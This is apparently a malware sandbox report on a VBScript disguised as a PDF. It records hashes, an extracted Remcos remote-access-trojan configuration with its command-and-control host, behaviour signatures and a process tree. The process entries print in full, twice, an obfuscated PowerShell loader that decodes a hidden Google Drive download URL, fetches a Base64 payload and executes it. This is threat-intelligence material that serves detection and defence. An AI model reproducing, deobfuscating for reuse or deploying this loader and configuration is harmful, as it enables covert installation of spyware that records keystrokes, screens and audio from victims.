Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

1800001255...df.vbs

windows7-x64

10

1800001255...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    30/09/2024, 09:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    18000012550_20240930_0078864246·pdf.vbs

  • Size

    70KB

  • MD5

    89985981616f5fdef265814322d9735d

  • SHA1

    a7a505cea8373907fec133bf34d8d38e86e4dfb2

  • SHA256

    701bac7c15873d9eadaf8a70ca969adb5d3036421f1872cc706adafc51f7f751

  • SHA512

    9129378a54842082be7097682acf92536c0fe2953d02ed8c27acd7d5e172c0c72b72993b9e4ce0ae208ee751187a66c0bd82771a40a4d6a63b052d7553d50eea

  • SSDEEP

    1536:sFfpwpBuWDXAU8M9CTszU4+fsEkbf11CLmVYf:sFfWSIA7MOfsEEfEf

Score
10/10
remcosremotehostdiscoveryrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • delete_file

    false

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-WDQFG0

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 9 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\18000012550_20240930_0078864246·pdf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholts ' Th,r$ThewigOphrsLAce oO GelnB Ju eaTpp flHe.lg: lkniHA lerO BencBCompon S msAAlbueIdetaiLUetabeEnigmR Omla=SpindN Fje eDupliWNumme- rescORuslab Idryj k reESapo CN.nphtBaand StenbSScr wYWoofsSHurryTAfte EvidenMFrodi.ba.leNOpti EHyperTUncan.U dslwBudgeeArchpbskannCTurd LAfsati Rhi,eKlorenPan eTMades ');Katedres ($Dodrantal110);Katedres (Rundholts 'Hypsf$ F,uaHChinco Ree bFormon MousaOptraiEntr,lTekste R.dir Y ed.SkaebH skydefindeaPastedHomoleTrumfr S,uls vows[Produ$ lutcPTermoa LiotaFlygthChecknFurn.gM skes.omefmSkyl o BandtSit moBeclarKipkas Enst] oida=Hepta$ Fo tOL mpwxCardiySalfehBlodge PraemHospioReguicInterySideoasexa nPanteiTurginqua r ');$Verdensanskuelser=Rundholts ' yros$TilbyHQuagmoDemo.bThwa nAsparaBedspi RheulIrr peSlalorFi ke.VersaDAnt co Rigew onfln Ophelencyko A,ndaReco dTopplFOptjei midtlLosseePatri(Reakt$vrdirSPrislyadenomObs epYdelsaEddert Datai EnebsDipsorEnligeRdgrarhyp osKosmo,Favou$sangrUFag nn ,ornl KiwaiSkannnAthe kPh lai FornnKul,kgRussi)Sp ed ';$Unlinking=$Millioner;Katedres (Rundholts 'Svare$Bill gnittalBrodeoPrecaBC phaATidsflstrow: b neAPremirBlethbU.dtroBredbrSkride Til TlektieZ lottTr cuSSnadr= ovn( UltrtUnexpeDai iSLorest,ppen- Urbap MiljaSkinnTTonguhDogca Avis$ EnspuImmornAdvislArm,tiDistnnS ckek Be tiP.opan itrigRundk)dagli ');while (!$Arboretets) {Katedres (Rundholts ',irpa$Slavog.ilkal Af ioChiefbLampeaOv rfl Erhv: MgledSk leiChitosMastipO ermabi,abt Justr,lguiiValfaaProbltTelefeStrindSlavi=Amt v$ onpatBabblr eneuTheateFae,a ') ;Katedres $Verdensanskuelser;Katedres (Rundholts 'AlmicSBestetKarabaKong rUnhy,tBanta-Di.gnSUnderlVinkee PredeGranipDisre Salig4.erho ');Katedres (Rundholts 'Deakt$Kutc,gSter,lfor aoParbobNudapaErhvelUnder: ScioA OsterLa,neb nsupo yranrJournePhanetgradie DanstArrigsTymon=Gildn(TrickTDesseeUud.os SkydtA lin-SpndvP TaagaS vertPaas hDuche Expel$RisenU AnkynEberulOrdeniVide,nMorgekFag,riRea snCar,ig.esti)Tellu ') ;Katedres (Rundholts ' Spil$Bhilig B yalm wkioMangabVisagaantimlK lif:BefelkFo.lei resblSvineoPickfmDwineeO eratNe vreAandsrLagrivMo,uliDega,sAntis=Om ld$In ongUndeflMusikoPreunbSamenaProdul Deuc:ProclM PolyiRempld ultedDilaneT.mmel OpbymUsselaOvertnSpe.idSc ig+Curba+ Ski,%Halvt$Sozz PTremoa Cif l CoupaFl esvOutcoeStemprBetone Apots .aks.Taks,cAfdano E bsuBa tin U.plt.opul ') ;$Sympatisrers=$Palaveres[$kilometervis];}$Suffragette=325927;$Fljl=31238;Katedres (Rundholts 'Ox.ge$ Demeg Infil Dis o be,obAm ioa Ta klAfsag:OppebT K lli polyl K.lbbD,stiaSkattgF naleOms yvAzurmiPietes.rihanVivi i iskenKlv dgP.rafeS,raar GhernFir,te Edmo Nylgh=Penta iveaG FlneeAfdelt.stig- HaloCNegatoSk slnTsni t PrepeSnyltnArchctSup r P ppi$E.traUBajonnfeltblC mosiInfornSlokekFuldbiUddannR incgAsymp ');Katedres (Rundholts 'Sniff$bredbgUndimlGeniooEpidob DommaInspilFa,rn:Ann.kSMa,prmUvor o Photk eonaeLattesSklms Fasc,=cater Vandc[TaxieS B,okyAccoysad.entDec.leFagtimMoile.KolleCDiscio Spi.nFred,v Omskeun.iprStilltGalni]Prefe:H sto: tmosF P,werG,easo.rescm Fru Bh.lpeaSona,s raneOvers6 Slid4NiterS,onglt Sub r.bdomiDeorinAandsgF,rst(Drues$Re,atTHj.ali TurdlSiderbMolaraProskgFodrseWhilev engeiSkabesDiartn ddb i Boo.n Udtrg Fde eRegnerTeg,snConv ePu ss) Kono ');Katedres (Rundholts 'Blres$ KommgW erel gentoChorob Gymna EskilGige :HominP ReceaBialotUnderrV detoTekstnAcroliNonrhsVel teUri.a ,igeo=Exces Stipu[midcaSsacchyFejlasGernetCoprieRegnsm In.i.angreTReforeendetxAngivtVange.,dvanEEngronRec vc onacoPolitd Scoui KybenCoppegDaaer]P ner:Tr ld:,eogaA ambeSRecomCS,davIStyr.IAteli.l vvaG ,radeHelodtAbe rS ajbat idsbrFlskeiUdstynA.bejg Para(Fluev$jubilSBerm.mMili o IdrtkForsteguds.s Fuel)Tyson ');Katedres (Rundholts 'Amtsr$Ge ekg TilblmooleoDybfrbUreidaKlepplVinbj:nonarJBone,oDiss.m FrafsAd.irvLndstiAdsb kCykeli Crann spirgbrido=Armkr$Si.yfP sti a synctSluknrTypomoPre rnInteriUnsnosaccoueEvaku.HypersEflaguTritibMidtps AbdatSelskr de miAgglunKaryagTyra (Sprjt$ Arb SClamwuTra.tfRe.apfNudisrUforsaFlon.gHyd,oe Fibrt Cojot oxieosma ,Thora$ejendFNyetalFejlkj andulMlkeg) Prot ');Katedres $Jomsviking;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2764
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholts ' Th,r$ThewigOphrsLAce oO GelnB Ju eaTpp flHe.lg: lkniHA lerO BencBCompon S msAAlbueIdetaiLUetabeEnigmR Omla=SpindN Fje eDupliWNumme- rescORuslab Idryj k reESapo CN.nphtBaand StenbSScr wYWoofsSHurryTAfte EvidenMFrodi.ba.leNOpti EHyperTUncan.U dslwBudgeeArchpbskannCTurd LAfsati Rhi,eKlorenPan eTMades ');Katedres ($Dodrantal110);Katedres (Rundholts 'Hypsf$ F,uaHChinco Ree bFormon MousaOptraiEntr,lTekste R.dir Y ed.SkaebH skydefindeaPastedHomoleTrumfr S,uls vows[Produ$ lutcPTermoa LiotaFlygthChecknFurn.gM skes.omefmSkyl o BandtSit moBeclarKipkas Enst] oida=Hepta$ Fo tOL mpwxCardiySalfehBlodge PraemHospioReguicInterySideoasexa nPanteiTurginqua r ');$Verdensanskuelser=Rundholts ' yros$TilbyHQuagmoDemo.bThwa nAsparaBedspi RheulIrr peSlalorFi ke.VersaDAnt co Rigew onfln Ophelencyko A,ndaReco dTopplFOptjei midtlLosseePatri(Reakt$vrdirSPrislyadenomObs epYdelsaEddert Datai EnebsDipsorEnligeRdgrarhyp osKosmo,Favou$sangrUFag nn ,ornl KiwaiSkannnAthe kPh lai FornnKul,kgRussi)Sp ed ';$Unlinking=$Millioner;Katedres (Rundholts 'Svare$Bill gnittalBrodeoPrecaBC phaATidsflstrow: b neAPremirBlethbU.dtroBredbrSkride Til TlektieZ lottTr cuSSnadr= ovn( UltrtUnexpeDai iSLorest,ppen- Urbap MiljaSkinnTTonguhDogca Avis$ EnspuImmornAdvislArm,tiDistnnS ckek Be tiP.opan itrigRundk)dagli ');while (!$Arboretets) {Katedres (Rundholts ',irpa$Slavog.ilkal Af ioChiefbLampeaOv rfl Erhv: MgledSk leiChitosMastipO ermabi,abt Justr,lguiiValfaaProbltTelefeStrindSlavi=Amt v$ onpatBabblr eneuTheateFae,a ') ;Katedres $Verdensanskuelser;Katedres (Rundholts 'AlmicSBestetKarabaKong rUnhy,tBanta-Di.gnSUnderlVinkee PredeGranipDisre Salig4.erho ');Katedres (Rundholts 'Deakt$Kutc,gSter,lfor aoParbobNudapaErhvelUnder: ScioA OsterLa,neb nsupo yranrJournePhanetgradie DanstArrigsTymon=Gildn(TrickTDesseeUud.os SkydtA lin-SpndvP TaagaS vertPaas hDuche Expel$RisenU AnkynEberulOrdeniVide,nMorgekFag,riRea snCar,ig.esti)Tellu ') ;Katedres (Rundholts ' Spil$Bhilig B yalm wkioMangabVisagaantimlK lif:BefelkFo.lei resblSvineoPickfmDwineeO eratNe vreAandsrLagrivMo,uliDega,sAntis=Om ld$In ongUndeflMusikoPreunbSamenaProdul Deuc:ProclM PolyiRempld ultedDilaneT.mmel OpbymUsselaOvertnSpe.idSc ig+Curba+ Ski,%Halvt$Sozz PTremoa Cif l CoupaFl esvOutcoeStemprBetone Apots .aks.Taks,cAfdano E bsuBa tin U.plt.opul ') ;$Sympatisrers=$Palaveres[$kilometervis];}$Suffragette=325927;$Fljl=31238;Katedres (Rundholts 'Ox.ge$ Demeg Infil Dis o be,obAm ioa Ta klAfsag:OppebT K lli polyl K.lbbD,stiaSkattgF naleOms yvAzurmiPietes.rihanVivi i iskenKlv dgP.rafeS,raar GhernFir,te Edmo Nylgh=Penta iveaG FlneeAfdelt.stig- HaloCNegatoSk slnTsni t PrepeSnyltnArchctSup r P ppi$E.traUBajonnfeltblC mosiInfornSlokekFuldbiUddannR incgAsymp ');Katedres (Rundholts 'Sniff$bredbgUndimlGeniooEpidob DommaInspilFa,rn:Ann.kSMa,prmUvor o Photk eonaeLattesSklms Fasc,=cater Vandc[TaxieS B,okyAccoysad.entDec.leFagtimMoile.KolleCDiscio Spi.nFred,v Omskeun.iprStilltGalni]Prefe:H sto: tmosF P,werG,easo.rescm Fru Bh.lpeaSona,s raneOvers6 Slid4NiterS,onglt Sub r.bdomiDeorinAandsgF,rst(Drues$Re,atTHj.ali TurdlSiderbMolaraProskgFodrseWhilev engeiSkabesDiartn ddb i Boo.n Udtrg Fde eRegnerTeg,snConv ePu ss) Kono ');Katedres (Rundholts 'Blres$ KommgW erel gentoChorob Gymna EskilGige :HominP ReceaBialotUnderrV detoTekstnAcroliNonrhsVel teUri.a ,igeo=Exces Stipu[midcaSsacchyFejlasGernetCoprieRegnsm In.i.angreTReforeendetxAngivtVange.,dvanEEngronRec vc onacoPolitd Scoui KybenCoppegDaaer]P ner:Tr ld:,eogaA ambeSRecomCS,davIStyr.IAteli.l vvaG ,radeHelodtAbe rS ajbat idsbrFlskeiUdstynA.bejg Para(Fluev$jubilSBerm.mMili o IdrtkForsteguds.s Fuel)Tyson ');Katedres (Rundholts 'Amtsr$Ge ekg TilblmooleoDybfrbUreidaKlepplVinbj:nonarJBone,oDiss.m FrafsAd.irvLndstiAdsb kCykeli Crann spirgbrido=Armkr$Si.yfP sti a synctSluknrTypomoPre rnInteriUnsnosaccoueEvaku.HypersEflaguTritibMidtps AbdatSelskr de miAgglunKaryagTyra (Sprjt$ Arb SClamwuTra.tfRe.apfNudisrUforsaFlon.gHyd,oe Fibrt Cojot oxieosma ,Thora$ejendFNyetalFejlkj andulMlkeg) Prot ');Katedres $Jomsviking;"
    1⤵
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3008
    • C:\Windows\syswow64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      PID:2956

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    8850dfe92619f12669805e8de233a82b

    SHA1

    650e7c17a6881fcb661adb0c262194467c85eca0

    SHA256

    63bee03d83e8e68ac8edbea22ab4bd893ace5ae9c9685abf95bbe8aebe7915f1

    SHA512

    41da5f98f8008aa341d2c887d089cd2d22f3c4e30abaac1f27d943480a742ed9468074af030b22d51aa318504879742ab6ab2647553efae5c832382785bcc7e8

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Forsvarsministers.Sca
    Filesize

    465KB

    MD5

    14b49dcb01461bfc4769023a403a5b1a

    SHA1

    c30a85bf569d584e918fe93be93494c76b119add

    SHA256

    1e8e511894d67dadb6441a4b9e9315d4f2ce396b89d6fc7631ee2ff5f103556b

    SHA512

    89089191d855f064b69a6b1499c25bdc0a5842e167dc17448bf18aa8aa4ec3abb7a852bdfbfc3acfba7c4240602536f52efcd31978d74e71a232e2f0ef21b42b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HXAOD70PPVWDMN1HUGVD.temp
    Filesize

    7KB

    MD5

    1186b4ea2cea56876176ed988c321884

    SHA1

    75c291c04e5c09647703d26d639f7d531abe01ee

    SHA256

    2668e5ea88d666ef301a6b093fb3d5b4f64f176397563abd50e646d655861abd

    SHA512

    2036f9f1aeacdb440c3e464f1dfbb7f9b106f3c569d6a3e6ae417526861215531fb8ba37c8b30eaa4bfaee9c7ff56f399f19928f70242df2f208aadba8d1b78c

    Download Submit

  • memory/2764-8-0x000007FEF3FE0000-0x000007FEF497D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2764-16-0x000007FEF3FE0000-0x000007FEF497D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2764-9-0x000007FEF3FE0000-0x000007FEF497D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2764-10-0x000007FEF3FE0000-0x000007FEF497D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2764-11-0x000007FEF3FE0000-0x000007FEF497D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2764-13-0x000007FEF429E000-0x000007FEF429F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2764-14-0x000007FEF3FE0000-0x000007FEF497D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2764-4-0x000007FEF429E000-0x000007FEF429F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2764-5-0x000000001B560000-0x000000001B842000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2764-6-0x0000000002690000-0x0000000002698000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2764-7-0x000007FEF3FE0000-0x000007FEF497D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2956-39-0x00000000004C0000-0x0000000001522000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2956-44-0x00000000004C0000-0x0000000001522000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/3008-20-0x0000000006760000-0x000000000A026000-memory.dmp

    Filesize

    56.8MB

    Download